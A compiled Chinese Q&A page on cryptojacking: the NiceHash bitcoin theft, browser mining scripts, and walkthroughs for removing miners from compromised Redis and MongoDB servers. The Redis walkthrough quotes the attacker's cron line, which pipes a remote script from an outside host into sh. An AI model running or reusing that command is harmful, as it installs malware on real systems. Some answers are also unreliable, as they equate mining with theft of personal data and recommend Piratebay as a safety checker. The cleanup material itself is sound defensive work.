網站黑客挖礦
斯洛維尼亞挖礦平台NiceHash周四在其官網發布一則聲明,聲稱該平台遭遇黑客攻擊,大量比特幣被盜,目前平台各項服務已全面關閉。
NiceHash方面表示比特幣被盜是因為錢包遭遇入侵,公司正在核實被盜的比特幣數量,並配合有關部門進行調查。根據存儲比特幣錢包的地址顯示,此次約有4700多枚比特幣被盜。
卡巴斯基實驗室的惡意軟體分析師Sergey Yunakovsky認為,加密貨幣不再是一個遙不可及的技術。最近,我們觀察到針對不同類型的加密貨幣的惡意軟體攻擊有所增加,我們預計這一趨勢將繼續下去。
而加密貨幣價格的飆漲是它們被黑客盯上的主要原因。比特幣在本周上演瘋狂上漲的行情,隨著本周六美國市場比特幣期貨推出的臨近,市場對比特幣的狂熱在周四達到新高潮,該數字貨幣價格在約40個小時內飆升了約40%,連續突破五個千元關口,升破17000美元。周四,一些交易所的比特幣價格甚至一度升破19000美元,24小時內漲幅超50%。
⑵ 當你瀏覽不良網站的時候,黑客們在干什麼
區塊律動 BlockBeats 做了個統計,截至7月9號,全網有超過3萬家網站內置了「挖礦」代碼,只要用戶打開網站進行瀏覽、操作,網站就會調用電腦或手機的計算資源,來進行「挖礦」。
如果你有瀏覽「黃色」網站的習慣,那你也應該注意一下,因為不少「黃色」網站未來增加收入也會加入「挖礦」代碼,除了網站所有者自行添加「挖礦」代碼之外,還有黑客黑入其他網站服務在代碼中,惡意植入「挖礦」代碼木馬的情況。是不是很可怕呢?小夥伴們有沒有遇到過手機莫名其妙發燙的現象呢?
⑶ 手機被別人挖礦是什麼意思
被挖礦是指瀏覽不良網站背後的黑客會通過程序竊取你的個人信息。
一旦出現這種情況,那麼就說明你的個人信息肯定是已經泄露了,而一般的正規網站是不會泄露用戶的個人信息,只有經常瀏覽一些釣魚網站、盜版資源網站和不良網站,才會導致個人信息泄露。另外,申請好友的陌生人,基本都是一些帶著「美女頭像」,且備注的信息都充滿誘導性,而目的就是為了讓我們同意。
⑷ 為什麼黑客們要廣設伺服器,用別人的手機設備去挖礦
因為用別人的手機會更加安全一點,這樣公安局或者安全局就不容易找到黑客的地址了。
「偷礦」是指未經你同意的情況下,黑客利用你的系統資源挖掘虛擬貨幣。這主要藉助於網站的 JavaScript 代碼,黑客在代碼中注入「偷礦」程序,當你訪問這些代碼時,「偷礦」程序便會偷偷自動運行。
雖然 Chrome 是最常用的瀏覽器,但是 Opera 瀏覽器提供了一些 Chrome 沒有的有趣功能。最新版本的 Opera 瀏覽器能夠自動攔截廣告,此外,它還內置了阻止挖礦的防護功能。這一功能可以阻止網站擅自運行非法挖礦的腳本,這與網頁上的廣告攔截技術並沒有太大區別。
2.使用清理程序
如果採用了上面的措施之後你仍然放心不下,那麼可以在電腦和智能手機上安裝 Malwarebytes 清理程序,它的電腦版是完全免費的,但是針對手機的高級版是收費的。隨著現在越來越多的區塊鏈項目開始採用手機挖礦,如果你不想讓自己的手機有被當作肉雞的風險,適當花點小錢也是值得的。
你仍然可以繼續使用像卡巴斯基這樣的防病毒軟體來保護自己的智能手機。
⑸ 阿里雲伺服器被挖礦了怎麼辦(純純電腦小白
1. 關閉訪問挖礦伺服器的訪問
iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.
2. chmod -x minerd ,取消掉執行許可權, 在沒有找到根源前,千萬不要刪除 minerd,因為刪除了,過一回會自動有生成一個。
3. pkill minerd ,殺掉進程
4. service stop crond 或者 crontab -r 刪除所有的執行計劃
5. 執行top,查看了一會,沒有再發現minerd 進程了。
6.檢查/var/spool/cron/目錄下發現有個root用戶的定時器文件。
下載腳本的語句:
*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105010 | sh
病毒文件內容如下,感興趣的可以研究下:
View Code
解決minerd並不是最終的目的,主要是要查找問題根源,我的伺服器問題出在了redis服務了,黑客利用了redis的一個漏洞獲得了伺服器的訪問許可權,http://blog.jobbole.com/94518/然後就注入了病毒,下面是解決辦法和清除工作:
1. 修復 redis 的後門,
配置bind選項, 限定可以連接Redis伺服器的IP, 並修改redis的默認埠6379.
配置AUTH, 設置密碼, 密碼會以明文方式保存在redis配置文件中.
配置rename-command CONFIG 「RENAME_CONFIG」, 這樣即使存在未授權訪問, 也能夠給攻擊者使用config指令加大難度
好消息是Redis作者表示將會開發」real user」,區分普通用戶和admin許可權,普通用戶將會被禁止運行某些命令,如conf
2. 打開 ~/.ssh/authorized_keys, 刪除你不認識的賬號
3. 查看你的用戶列表,是不是有你不認識的用戶添加進來。 如果有就刪除掉.
⑹ 瀏覽非法網站的時候,黑客們到底在做什麼
眾所周知,現在是一個網路的社會,人們已經完完全全離不開網路。網路也給我們帶來了很多的方便,比如現在足不出戶,通過手機和電腦就可以了解到天下的事情。對於網上沖浪這件事情,很多人都喜歡在手機上,但也有不少的人喜歡在電腦上。現在不少的城裡人喜歡在電腦上打開一些小的網站,有時候還會看一些成人網站,我也覺得這種事情都是非常私密的,沒有人知道,但當你打開那一刻,全世界的黑客都開心。這又是為何呢?
這種挖礦能夠嚴重的損傷電腦的CPU,能夠使電腦以及手機長時間高強度的運作,進行不停的運算,所以大家在瀏覽網頁的時候,一定要瀏覽一些正規的網站。對於一些電腦管家或者是電腦保護軟體報警的網站我們都應該關掉,所以網路是一把雙刃劍,利用好了我們能夠增長知識,如果利用不好就有可能掉到網路的陷阱里
⑺ 手機被挖礦怎麼辦
可以使用設備訪問檢測網站(例如 Piratebay)來確認其安全性。
雖然 Chrome 是最常用的瀏覽器,但是 Opera 瀏覽器提供了一些 Chrome 沒有的有趣功能。最新版本的 Opera 瀏覽器能夠自動攔截廣告,此外,它還內置了阻止挖礦的防護功能。這一功能可以阻止網站擅自運行非法挖礦的腳本,這與網頁上的廣告攔截技術並沒有太大區別。
相關信息:
「偷礦」是指未經你同意的情況下,黑客利用你的系統資源挖掘虛擬貨幣。這主要藉助於網站的 Java 代碼,黑客在代碼中注入「偷礦」程序,當你訪問這些代碼時,「偷礦」程序便會偷偷自動運行。
雖然黑客能夠主動入侵網站來運行挖礦腳本,但需要注意的是,那些使用了類似 Coinhive.com 這種插件服務的網站無意中也會給黑客提供更多的可乘之機。
⑻ 伺服器被攻擊並植入kdevtmpfsi挖礦/病毒/木馬
MongoDB庫中的數據莫名其妙沒有了,發覺如下信息:
1、 top -d 5命令 ,查看系統負載情況、是否有未知進程,發現一個名為kdevtmpfsi的進程,經科普它是一個挖礦程序,會佔用伺服器高額的CPU、內存資源。如圖,CPU佔用率高達788.7%,而且是yarn用戶下:
2、 ps -ef |grep kdevtmpfsi 命令查看 該挖礦程序路徑:/tmp/kdevtmpfsi
3、 ps -ef |grep yarn 命令查看更多關於yarn相關進程信息(此時我的伺服器並沒有開啟yarn服務,如果有yarn的相關進程則可判斷是攻擊者開啟的進程),發現另外還有個kinsing進程,經科普kinsing進程是kdevtmpfsi的守護進程:
4、 netstat -lntupaa 命令查看是否有異常的ip,果然發現194.87.102.77這個陌生的ip,判斷是kdevtmpfsi的發出者:
5、經查詢該ip的所在國家是俄羅斯:
6、 find / -iname kdevtmpfsi 命令再次確定命令所在位置以便刪除:
7、 cd /tmp 進入相關目錄:
8、 rm -rf kdevtmpfsi 刪除kdevtmpfsi程序:
9、** kill -9 40422**殺掉kdevtmpfsi進程:
10、發現並沒殺掉所有kdevtmpfsi進程,再次查找yarn的相關進程(因為之前已確認病毒是在yarn下),果真還有kdevtmpfsi進程存在:
11、用命令 批量殺掉 相關進程:
12、刪除kinsing文件:
13、現在,已經把挖礦程序及相關進程刪除掉了,但是還有兩處沒做處理:
14、 crontab -l 命令先看看crontab的定時任務列表吧:
15、編寫刪除挖礦程序腳本 kill_kdevtmpfsi.sh :
16、新增 定時任務 並刪除攻擊者的挖礦定時任務:
17、 crontab -l命令 查看現在只有殺進程的定時任務了:
18、禁止黑客的IP地址。
最初安裝MongoDB時,並未設置密碼認證,存在漏洞,導致黑客通過漏洞攻擊伺服器,並在程序里植入木馬/病毒。單純的kill -9 id殺掉病毒進程是殺不徹底的,治標不治本,應該定時刪除病毒進程,禁止攻擊者IP,重新安裝系統或相關軟體。
經過幾天的觀察,伺服器運行正常,再沒有被黑客攻擊成功。
⑼ 最近聽說進入不良網站,黑客會拿我們的手機挖礦啥的,自動彈出的不良網站我點進去一秒就退了,被挖礦嗎
沒有想的那麼神奇。。現在的不良網站一般都是教人如何賭博。。如何打架什麼的。通常會有賭博網站的連接在裡面。。誘惑你去賭博的。。沒有什麼挖礦什麼的。。退出去以後。重啟下手機。。基本就正常了。。